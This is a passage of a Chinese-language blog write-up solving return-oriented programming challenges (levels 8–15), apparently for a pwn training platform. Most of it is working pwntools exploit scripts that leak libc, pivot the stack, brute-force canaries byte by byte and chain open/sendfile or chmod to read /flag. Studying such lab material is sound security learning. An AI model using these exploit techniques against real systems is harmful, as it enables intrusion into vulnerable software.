<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">path=<span class="string">&#x27;/challenge/babyrop_level8.0&#x27;</span></span><br><span class="line">pop_rdi = p64(<span class="number">0x401fd3</span>)</span><br><span class="line">pop_rsip = p64(<span class="number">0x401fd1</span>)</span><br><span class="line">pop_rdx_pop_rcxpl=<span class="number">0x10257d</span></span><br><span class="line">putsg=p64(<span class="number">0x404028</span>)</span><br><span class="line">putsp=p64(<span class="number">0x401110</span>)</span><br><span class="line">putsl=<span class="number">0x084420</span></span><br><span class="line">sendfilel=<span class="number">0x1131C0</span></span><br><span class="line">openl=<span class="number">0x10df00</span></span><br><span class="line">data_addr=p64(<span class="number">0x404078</span>)</span><br><span class="line">read=p64(<span class="number">0x401140</span>)</span><br><span class="line">trash=p64(<span class="number">114514</span>)</span><br><span class="line">challenge=p64(<span class="number">0x401D29</span>)</span><br><span class="line"></span><br><span class="line">p=process(path)</span><br><span class="line">payload1=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x28</span>+pop_rdi+putsg+putsp+challenge</span><br><span class="line">p.send(payload1)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;Leaving!\n&#x27;</span>)</span><br><span class="line">puts=p.recvline()[:-<span class="number">1</span>]</span><br><span class="line">base=<span class="built_in">int</span>.frombytes(puts,<span class="string">&#x27;little&#x27;</span>)-putsl</span><br><span class="line">pop_rdx_pop_rcxp=p64(pop_rdx_pop_rcxpl+base)</span><br><span class="line">sendfile=p64(sendfilel+base)</span><br><span class="line"><span class="built_in">open</span>=p64(openl+base)</span><br><span class="line"></span><br><span class="line">payload2=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x28</span>+pop_rdi+p64(<span class="number">0</span>)+pop_rsip+data_addr+trash+pop_rdx_pop_rcxp+p64(<span class="number">16</span>)+trash*<span class="number">2</span>+read+pop_rdi+data_addr+pop_rsip+p64(<span class="number">0</span>)*<span class="number">2</span>\</span><br><span class="line">+<span class="built_in">open</span>+pop_rdi+p64(<span class="number">1</span>)+pop_rsip+p64(<span class="number">3</span>)+p64(<span class="number">0</span>)+pop_rdx_pop_rcxp+p64(<span class="number">0</span>)+p64(<span class="number">100</span>)+trash+sendfile</span><br><span class="line">payload3=<span class="string">b&#x27;/flag&#x27;</span></span><br><span class="line">p.send(payload2)</span><br><span class="line">sleep(<span class="number">1</span>)</span><br><span class="line">p.send(payload3)</span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="level-9"><a href="#level-9" class="headerlink" title="level 9"></a>level 9</h2><p>栈迁移，题目允许我们在retaddr开始写入3个64位数<br>考虑覆盖第一个返回地址为 pop rbp ret(从leave return)，随后接上bss段。然后再leave return<br>事实上 rbp的位置并不是非常重要 从我们的ROP链来看 我们用到的要么是直接call一个函数 要么是 pop ret，这两个其实都不会破坏栈的状态。<br>因此如果有pop rsp也不是不行 比如 0x00000000004014b4 : pop rsp ; pop r13 ; pop rbp ; ret<br>但这题给了三个 就不管了<br>这时候还需要考虑到第二次return challenge的时候栈空间的问题，一个方便的做法就是第二次的时候前三个覆盖和return adress后面相同的内容，其他的就不管，因为第二次我们压根不需要栈迁移。<br>这一题还有个有意思的事情就是栈对齐<br>如果栈没有16字节对齐 会导致segmentation fault<br>利用gdb会发现 在printf里面的代码中 用到了xmm寄存器。<br>今后构造的时候也是 最好控制栈对齐。</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">path=<span class="string">&#x27;/challenge/babyrop_level9.0&#x27;</span></span><br><span class="line">pop_rdi = p64(<span class="number">0x402453</span>)</span><br><span class="line">pop_rsip = p64(<span class="number">0x402451</span>)</span><br><span class="line">pop_rbp=p64(<span class="number">0x40129d</span>)</span><br><span class="line">leave_ret=p64(<span class="number">0x402336</span>)</span><br><span class="line">pop_rdx_pop_rcxpl=<span class="number">0x10257d</span></span><br><span class="line">putsg=p64(<span class="number">0x405028</span>)</span><br><span class="line">putsp=p64(<span class="number">0x401120</span>)</span><br><span class="line">putsl=<span class="number">0x084420</span></span><br><span class="line">sendfilel=<span class="number">0x1131C0</span></span><br><span class="line">openl=<span class="number">0x10df00</span></span><br><span class="line">data_addr=p64(<span class="number">0x4150C0</span>)</span><br><span class="line">buf=<span class="number">0x4150E0</span></span><br><span class="line">read=p64(<span class="number">0x401150</span>)</span><br><span class="line">trash=p64(<span class="number">114514</span>)</span><br><span class="line">challenge=p64(<span class="number">0x402155</span>)</span><br><span class="line"></span><br><span class="line">p=process(path,<span class="string">&#x27;break challenge&#x27;</span>)</span><br><span class="line">payload1=pop_rbp+p64(buf+<span class="number">3</span>*<span class="number">8</span>)+leave_ret+trash+pop_rdi+putsg+putsp+p64(<span class="number">0x402337</span>)+challenge</span><br><span class="line">p.send(payload1)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;Leaving!\n&#x27;</span>)</span><br><span class="line">puts=p.recvline()[:-<span class="number">1</span>]</span><br><span class="line">base=<span class="built_in">int</span>.from_bytes(puts,<span class="string">&#x27;little&#x27;</span>)-putsl</span><br><span class="line">pop_rdx_pop_rcxp=p64(pop_rdx_pop_rcxpl+base)</span><br><span class="line">sendfile=p64(sendfilel+base)</span><br><span class="line"><span class="built_in">open</span>=p64(openl+base)</span><br><span class="line"></span><br><span class="line">payload2=(pop_rdi+p64(<span class="number">0</span>)+pop_rsip).ljust(<span class="built_in">len</span>(payload1),<span class="string">b&#x27;b&#x27;</span>)+pop_rdi+p64(<span class="number">0</span>)+pop_rsip+data_addr+trash+pop_rdx_pop_rcxp+p64(<span class="number">16</span>)+trash*<span class="number">2</span>+read+pop_rdi+data_addr+pop_rsip+p64(<span class="number">0</span>)*<span class="number">2</span>\</span><br><span class="line">+<span class="built_in">open</span>+pop_rdi+p64(<span class="number">1</span>)+pop_rsip+p64(<span class="number">3</span>)+p64(<span class="number">0</span>)+pop_rdx_pop_rcxp+p64(<span class="number">0</span>)+p64(<span class="number">100</span>)+trash+sendfile</span><br><span class="line">payload3=<span class="string">b&#x27;/flag&#x27;</span></span><br><span class="line">p.send(payload2)</span><br><span class="line">sleep(<span class="number">1</span>)</span><br><span class="line">p.send(payload3)</span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="level-10"><a href="#level-10" class="headerlink" title="level 10"></a>level 10</h2><p>栈迁移 修改了返回地址之后，main函数的栈就会跑到覆盖之后的位置，那么之后main再leave就会被我们利用<br>因此，题目泄露给我们buf的地址，我们要填入的就是buf-16,这样第一次leave return ，rbp就变成了buf-16 然后再leave return就返回到buf-8指向的函数。<br>这时候要注意 如果返回到puts 会导致程序segmentation fault 因为返回之后 rsp在rbp下方，这就会导致puts覆盖了我们构造的栈帧。<br>因此我们还需要跳过puts函数，只要覆盖一个字节即可，因为两者的地址相差很小。</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">path=<span class="string">&#x27;./level10.0&#x27;</span></span><br><span class="line">p=process(path)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;is located at: &#x27;</span>)</span><br><span class="line">buf=<span class="built_in">int</span>(p.recvline().decode(<span class="string">&#x27;l1&#x27;</span>).strip().strip(<span class="string">&#x27;.&#x27;</span>),<span class="number">16</span>)</span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x48</span>+p64(buf-<span class="number">16</span>)+<span class="string">b&#x27;\xA7&#x27;</span></span><br><span class="line">p.send(payload)</span><br><span class="line">sleep(<span class="number">1</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p>第二关非常有意思，如果你不仔细看的话，每次都会出现这个报错<br>babyrop_level10.1: <stdin>:42: challenge: Assertion &#96;mprotect(data.win_addr, 0x138, PROT_READ|PROT_EXEC) &#x3D;&#x3D; 0’ failed.<br>再一看代码，会发现覆盖一个字节是不够的<br><img src="/2025/02/27/Return-Oriented-programming/level10.1.png" alt="奇妙的地址" loading="lazy"><br>可以看到地址整好卡0x100边界处 所以进位了。<br>因此用覆盖两个字节的方法即可解决</p>
<h2 id="level-11"><a href="#level-11" class="headerlink" title="level 11"></a>level 11</h2><p>区别在哪 😓</p>
<h2 id="level-12"><a href="#level-12" class="headerlink" title="level 12"></a>level 12</h2><p>目前没想到什么很好的策略 打算是直接和额前面差不多 爆破出libc中leave return地址<br>先用gdb打开查一下加载的基地址<br>找出一个可能的leave ret的地址之后 就一直用这个爆破<br>我试出来一个0x3fd8c8<br>其他的事实上和前面的差不多<br><strong>注意:爆破的时候一定要加上break！！！不然你就会一直纳闷自己哪里错了</strong></p>
<h2 id="level-13"><a href="#level-13" class="headerlink" title="level 13"></a>level 13</h2><p>先泄露canary 然后覆盖返回地址重新掉调用一遍challenge,再泄露libc基地址。然后就可以随便构造了</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">pop_rdil=<span class="number">0x23b6a</span></span><br><span class="line">pop_rsipl=<span class="number">0x23b68</span></span><br><span class="line">pop_rdx_pop_rcxpl=<span class="number">0x10257d</span></span><br><span class="line">sendfilel=<span class="number">0x1131C0</span></span><br><span class="line">openl=<span class="number">0x10df00</span></span><br><span class="line">trash=p64(<span class="number">114514</span>)</span><br><span class="line"></span><br><span class="line">path=<span class="string">&#x27;/challenge/babyrop_level13.0&#x27;</span></span><br><span class="line">p=process(path)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;is located at: &#x27;</span>)</span><br><span class="line">buf=<span class="built_in">int</span>(p.recvline().decode(<span class="string">&#x27;l1&#x27;</span>).strip().strip(<span class="string">&#x27;.&#x27;</span>),<span class="number">16</span>)</span><br><span class="line">canary=buf+<span class="number">0x38</span></span><br><span class="line">p.sendline(<span class="built_in">hex</span>(canary))</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;[LEAK] *&#x27;</span>)</span><br><span class="line">canary=<span class="built_in">int</span>(p.recvline().decode(<span class="string">&#x27;l1&#x27;</span>).split(<span class="string">&#x27;=&#x27;</span>)[-<span class="number">1</span>],<span class="number">16</span>)</span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x38</span>+p64(canary)+p64(<span class="number">114514</span>)+<span class="string">b&#x27;\x69&#x27;</span></span><br><span class="line">p.send(payload)</span><br><span class="line">p.sendline(<span class="built_in">hex</span>(buf+<span class="number">0x48</span>))</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;[LEAK] *&#x27;</span>)</span><br><span class="line">temp=<span class="built_in">int</span>(p.recvline().decode(<span class="string">&#x27;l1&#x27;</span>).split(<span class="string">&#x27;=&#x27;</span>)[-<span class="number">1</span>],<span class="number">16</span>)</span><br><span class="line">base=temp-<span class="number">0x24083</span></span><br><span class="line"></span><br><span class="line">pop_rdi=p64(pop_rdil+base)</span><br><span class="line">pop_rsip=p64(pop_rsipl+base)</span><br><span class="line">pop_rdx_pop_rcxp=p64(pop_rdx_pop_rcxpl+base)</span><br><span class="line">sendfile=p64(sendfilel+base)</span><br><span class="line"><span class="built_in">open</span>=p64(openl+base)</span><br><span class="line"></span><br><span class="line">payload=<span class="string">b&#x27;/flag\x00&#x27;</span>.ljust(<span class="number">0x38</span>,<span class="string">b&#x27;a&#x27;</span>)+p64(canary)+trash+pop_rdi+p64(buf)+pop_rsip+p64(<span class="number">0</span>)*<span class="number">2</span>\</span><br><span class="line">+<span class="built_in">open</span>+pop_rdi+p64(<span class="number">1</span>)+pop_rsip+p64(<span class="number">3</span>)+p64(<span class="number">0</span>)+pop_rdx_pop_rcxp+p64(<span class="number">0</span>)+p64(<span class="number">100</span>)+trash+sendfile</span><br><span class="line">p.send(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="level-14"><a href="#level-14" class="headerlink" title="level 14"></a>level 14</h2><p>基本思路:<br>用爆破来确定代码段和canary 只需要检查返回中是否有 b’Goodbye’ 即可<br>这最坏也只需要16*256次就能解决。</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">temp=<span class="string">b&#x27;&#x27;</span></span><br><span class="line"><span class="keyword">for</span> x <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">16</span>):</span><br><span class="line">    <span class="keyword">if</span> x==<span class="number">8</span>:</span><br><span class="line">        temp+=p64(<span class="number">114514</span>)</span><br><span class="line">    <span class="keyword">for</span> c <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">256</span>):</span><br><span class="line">        <span class="keyword">if</span> x==<span class="number">8</span>:</span><br><span class="line">            c=<span class="number">0xC8</span></span><br><span class="line">        c=<span class="built_in">chr</span>(c).encode(<span class="string">&#x27;l1&#x27;</span>)</span><br><span class="line">        payload=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x58</span>+temp+c</span><br><span class="line">        p=remote(<span class="string">&#x27;localhost&#x27;</span>,<span class="number">1337</span>)</span><br><span class="line">        p.send(payload)</span><br><span class="line">        a=p.recvall(timeout=<span class="number">5</span>)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">b&#x27;Goodbye&#x27;</span> <span class="keyword">in</span> a:</span><br><span class="line">            temp+=c</span><br><span class="line">            <span class="built_in">print</span>(temp)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"><span class="comment"># 获取基地址</span></span><br><span class="line"><span class="built_in">print</span>(temp)</span><br><span class="line">canary=temp[:<span class="number">8</span>]</span><br><span class="line">text_base=<span class="built_in">int</span>.from_bytes(temp[<span class="number">16</span>:],<span class="string">&#x27;little&#x27;</span>)-<span class="number">0x1EC8</span></span><br><span class="line">putsp=p64(text_base+<span class="number">0x11D0</span>)</span><br><span class="line">putsg=p64(text_base+<span class="number">0x3F30</span>)</span><br><span class="line">data_addr=p64(text_base+<span class="number">0x4000</span>)</span><br><span class="line">pop_rdi=p64(text_base+<span class="number">0x001f53</span>)</span><br><span class="line">leave_ret=p64(text_base+<span class="number">0x1836</span>)</span><br><span class="line">trash=p64(<span class="number">114514</span>)</span><br><span class="line">payload1=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x58</span>+canary+trash+pop_rdi+putsg+putsp</span><br><span class="line">p=remote(<span class="string">&#x27;localhost&#x27;</span>,<span class="number">1337</span>)</span><br><span class="line">p.send(payload1)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;Leaving!\n&#x27;</span>)</span><br><span class="line">libc_base_putsl=<span class="built_in">int</span>.from_bytes(p.recvline()[:-<span class="number">1</span>],<span class="string">&#x27;little&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 构造ROP链</span></span><br><span class="line"><span class="comment"># leave_retl=0x578c8</span></span><br><span class="line"><span class="comment"># pop_rdil=0x23b6a</span></span><br><span class="line">pop_rsipl=<span class="number">0x23b68</span></span><br><span class="line">pop_rdx_pop_rcxpl=<span class="number">0x10257d</span></span><br><span class="line">sendfilel=<span class="number">0x1131C0</span></span><br><span class="line">openl=<span class="number">0x10df00</span></span><br><span class="line">readl=<span class="number">0x10e1e0</span></span><br><span class="line">putsl=<span class="number">0x084420</span></span><br><span class="line">libc_base=libc_base_putsl-putsl</span><br><span class="line">pop_rsip=p64(pop_rsipl+libc_base)</span><br><span class="line">pop_rdx_pop_rcxp=p64(pop_rdx_pop_rcxpl+libc_base)</span><br><span class="line">sendfile=p64(sendfilel+libc_base)</span><br><span class="line"><span class="built_in">open</span>=p64(openl+libc_base)</span><br><span class="line">read=p64(readl+libc_base)</span><br><span class="line">p=remote(<span class="string">&#x27;localhost&#x27;</span>,<span class="number">1337</span>)</span><br><span class="line">payload2=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x58</span>+canary+trash+pop_rdi+p64(<span class="number">0</span>)+pop_rsip+data_addr+trash+pop_rdx_pop_rcxp+p64(<span class="number">16</span>)+trash*<span class="number">2</span>+read+pop_rdi+data_addr+pop_rsip+p64(<span class="number">0</span>)*<span class="number">2</span>\</span><br><span class="line">+<span class="built_in">open</span>+pop_rdi+p64(<span class="number">1</span>)+pop_rsip+p64(<span class="number">3</span>)+p64(<span class="number">0</span>)+pop_rdx_pop_rcxp+p64(<span class="number">0</span>)+p64(<span class="number">100</span>)+trash+sendfile</span><br><span class="line">payload3=<span class="string">b&#x27;/flag&#x27;</span></span><br><span class="line">p.send(payload2)</span><br><span class="line">sleep(<span class="number">1</span>)</span><br><span class="line">p.send(payload3)</span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>** 有很小的概率libc会随机到\x0a和\x00自己 这时候重启一下再运行就行了</p>
<h2 id="level-15"><a href="#level-15" class="headerlink" title="level 15"></a>level 15</h2><p>这题爆破libc地址其实不难 我们控制函数重新返回到main然后recv检测是否eof即可<br>难点在于我们的ropchain很难利用到&#x2F;flag这个字符串<br>同时onegadget和ropchain生成的binsh利用方式都被禁止了(没有-p)<br>那应该怎么办呢，我们可以把&#x2F;flag软链接到一个libc里面有的字符串的名字 再通过软连接修改&#x2F;flag的权限<br>在检测是否eof的时候，会有个问题就是没有eof会被漏掉 然后他的进程又存在 这样整个连接就会卡住 ，因为没有给他输入。<br>解决方法是手动kill<br>还有个方法是用pwntools获取pid然后kill  但是我懒得搞</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.arch=<span class="string">&#x27;amd64&#x27;</span></span><br><span class="line">temp=<span class="string">b&#x27;&#x27;</span></span><br><span class="line"><span class="keyword">for</span> x <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">8</span>):</span><br><span class="line">    <span class="keyword">for</span> c <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">256</span>):</span><br><span class="line">        c=<span class="built_in">chr</span>(c).encode(<span class="string">&#x27;l1&#x27;</span>)</span><br><span class="line">        payload=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x18</span>+temp+c</span><br><span class="line">        p=remote(<span class="string">&#x27;localhost&#x27;</span>,<span class="number">1337</span>)</span><br><span class="line">        p.send(payload)</span><br><span class="line">        a=p.recvall(timeout=<span class="number">2</span>)</span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">not</span>(<span class="string">b&#x27;detected&#x27;</span> <span class="keyword">in</span> a):</span><br><span class="line">                temp+=c</span><br><span class="line">                <span class="built_in">print</span>(temp)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">temp+=p64(<span class="number">114514</span>)</span><br><span class="line">temp+=<span class="string">b&#x27;\x69&#x27;</span></span><br><span class="line"><span class="keyword">for</span> x <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    <span class="keyword">for</span> c <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="number">256</span>):</span><br><span class="line">        c=<span class="built_in">chr</span>(c).encode(<span class="string">&#x27;l1&#x27;</span>)</span><br><span class="line">        p=remote(<span class="string">&#x27;localhost&#x27;</span>,<span class="number">1337</span>)</span><br><span class="line">        payload=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x18</span>+temp+c</span><br><span class="line">        p.send(payload)</span><br><span class="line">        p.recvuntil(<span class="string">b&#x27;### Goodbye!\n&#x27;</span>)</span><br><span class="line">        text=<span class="string">b&#x27;?&#x27;</span></span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            text=p.recv(<span class="number">3</span>)</span><br><span class="line">        <span class="keyword">except</span> EOFError:</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">not</span>(<span class="string">b&#x27;###&#x27;</span> <span class="keyword">in</span> text):</span><br><span class="line">                <span class="keyword">continue</span></span><br><span class="line">        temp+=c</span><br><span class="line">        <span class="built_in">print</span>(temp)</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line"><span class="comment"># 获取基地址</span></span><br><span class="line"><span class="comment"># 获取基地址</span></span><br><span class="line"><span class="built_in">print</span>(temp)</span><br><span class="line">canary=temp[:<span class="number">8</span>]</span><br><span class="line"><span class="comment"># text_base=int.from_bytes(temp[16:],&#x27;little&#x27;)-0x1776</span></span><br><span class="line"><span class="comment"># putsp=p64(text_base+0x1150)</span></span><br><span class="line"><span class="comment"># putsg=p64(text_base+0x3F60)</span></span><br><span class="line"><span class="comment"># data_addr=p64(text_base+0x4000)</span></span><br><span class="line"><span class="comment"># pop_rdi=p64(text_base+0x1803)</span></span><br><span class="line"><span class="comment"># leave_ret=p64(text_base+0x15ab)</span></span><br><span class="line"><span class="comment"># # trash=p64(114514)</span></span><br><span class="line"><span class="comment"># # payload1=b&#x27;a&#x27;*0x88+canary+trash+pop_rdi+putsg+putsp</span></span><br><span class="line"><span class="comment"># # p=remote(&#x27;localhost&#x27;,1337)</span></span><br><span class="line"><span class="comment"># # p.send(payload1)</span></span><br><span class="line"><span class="comment"># # p.recvuntil(b&#x27;Leaving!\n&#x27;)</span></span><br><span class="line"><span class="comment"># libc_base_putsl=int.from_bytes(p.recvline()[:-1],&#x27;little&#x27;)</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># chmod</span></span><br><span class="line">libc_base=<span class="built_in">int</span>.from_bytes(temp[<span class="number">16</span>:],<span class="string">&#x27;little&#x27;</span>)-<span class="number">0x24069</span></span><br><span class="line">libc=ELF(<span class="string">&quot;/lib/x86_64-linux-gnu/libc.so.6&quot;</span>)</span><br><span class="line">libc.address=libc_base</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(libc_base))</span><br><span class="line">pause()</span><br><span class="line">rop = ROP(libc)</span><br><span class="line">pop_rdi_ret=p64(rop.rdi.address)</span><br><span class="line">pop_rsi_ret=p64(rop.rsi.address)</span><br><span class="line">filename=p64(<span class="built_in">next</span>(libc.search(<span class="string">b&quot;GNU&quot;</span>)))</span><br><span class="line">mode=<span class="number">0o4</span></span><br><span class="line">chmod=p64(libc.symbols[<span class="string">&quot;chmod&quot;</span>])</span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x18</span>+canary+p64(<span class="number">114514</span>)+pop_rdi_ret+filename+pop_rsi_ret+p64(mode)+chmod</span><br><span class="line">p=remote(<span class="string">&#x27;localhost&#x27;</span>,<span class="number">1337</span>)</span><br><span class="line">p.send(payload)</span><br></pre></td></tr></table></figure>
<p>有时候一次不成功 就多试几次 2333</p>
</div></section><div id="reward-container"><span class="hty-icon-button button-glow" id="reward-button" title="打赏" onclick="var qr = document.getElementById(&quot;qr&quot;); qr.style.display = (qr.style.display === &quot;none&quot;) ? &quot;block&quot; : &quot;none&quot;;"><span class="icon iconify" data-icon="ri:hand-coin-line"></span></span><div id="reward-comment">v我50.</div><div id="qr" style="display:none;"><div style="display:inline-block"><a href="/QRpay/WechatPay.jpg"><img loading="lazy" src="/QRpay/WechatPay.jpg" alt="微信" title="微信"></a><div><span style="color:#2DC100"><span class="icon iconify" data-icon="ri:wechat-pay-line"></span></span></div></div></div></div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>py</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="http://juryorca.github.io/2025/02/27/Return-Oriented-programming/" title="Return_Oriented_programming(completed)">http://juryorca.github.io/2025/02/27/Return-Oriented-programming/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><span class="icon iconify" data-icon="ri:creative-commons-line"></span><span class="icon iconify" data-icon="ri:creative-commons-by-line"></span><span class="icon iconify" data-icon="ri:creative-commons-nc-line"></span><span class="icon iconify" data-icon="ri:creative-commons-sa-line"></span></a> 许可协议。</li></ul></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/2025/03/07/Dynamic-Allocator-Misuse/" rel="prev" title="Dynamic_Allocator_Misuse"><span class="icon iconify" data-icon="ri:arrow-left-s-line"></span><span class="post-nav-text">Dynamic_Allocator_Misuse</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/2025/02/26/test/" rel="next" title="测试"><span class="post-nav-text">测试</span><span class="icon iconify" data-icon="ri:arrow-right-s-line"></span></a></div></div></div><div class="hty-card" id="comment"></div></main><footer class="sidebar-translate" id="footer"><div class="copyright"><span>&copy; 2019 – 2025 </span><span class="with-love" id="animate"><span class="icon iconify" data-icon="ri:cloud-line"></span></span><span class="author"> py</span></div><div class="powered"><span>由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v7.3.0</span><span class="footer-separator">|</span><span>主题 - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.10.11</span></div></footer></div><a class="hty-icon-button" id="back-to-top" aria-label="back-to-top" href="#"><span class="icon iconify" data-icon="ri:arrow-up-s-line"></span><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#0078E7" stroke-width="2" stroke-linecap="round"></circle></svg></a><script src="https://fastly.jsdelivr.net/npm/medium-zoom@1.0.6/dist/medium-zoom.min.js"></script><script>const images = [...document.querySelectorAll('.markdown-body img')]
mediumZoom(images)</script><style>.medium-zoom-image {
  z-index: 99;
}</style></body></html>